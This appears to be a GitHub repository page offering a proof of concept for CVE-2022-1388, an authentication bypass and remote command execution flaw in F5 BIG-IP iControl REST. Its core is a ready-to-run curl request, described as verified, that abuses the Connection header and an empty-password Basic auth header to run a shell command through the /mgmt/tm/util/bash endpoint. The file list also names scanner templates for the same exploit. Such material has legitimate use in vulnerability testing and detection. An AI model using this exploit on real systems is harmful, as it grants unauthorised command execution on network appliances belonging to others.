CVE-2022-1388

BIG-IP iControl REST vulnerability CVE-2022-1388

Usage

This POC is Verified!

curl -i -s -k -X $'POST' \
    -H $'Host: localhost' -H $'Connection: keep-alive, X-F5-Auth-Token' -H $'Authorization: Basic YWRtaW46' -H $'X-F5-Auth-Token: a' -H $'Content-Length: 39' \
    --data-binary $'{\"command\":\"run\",\"utilCmdArgs\":\"-c id\"}' \
    $'https://IP_HERE/mgmt/tm/util/bash'

Reference

https://twitter.com/1ZRR4H/status/1522150111429726209 https://twitter.com/AnnaViolet20/status/1523564632140509184

Name		Name	Last commit message	Last commit date
Latest commit History 11 Commits
README.md		README.md
bigip-icontrol-rest-rce.yaml		bigip-icontrol-rest-rce.yaml
f5-icontrol-rest-api-auth-bypass.yaml		f5-icontrol-rest-api-auth-bypass.yaml
pic.jpeg		pic.jpeg
rce.jpeg		rce.jpeg

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

CVE-2022-1388

Usage

Reference

About

Releases

Packages

numanturle/CVE-2022-1388

Folders and files

Latest commit

History

Repository files navigation

CVE-2022-1388

Usage

Reference

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Packages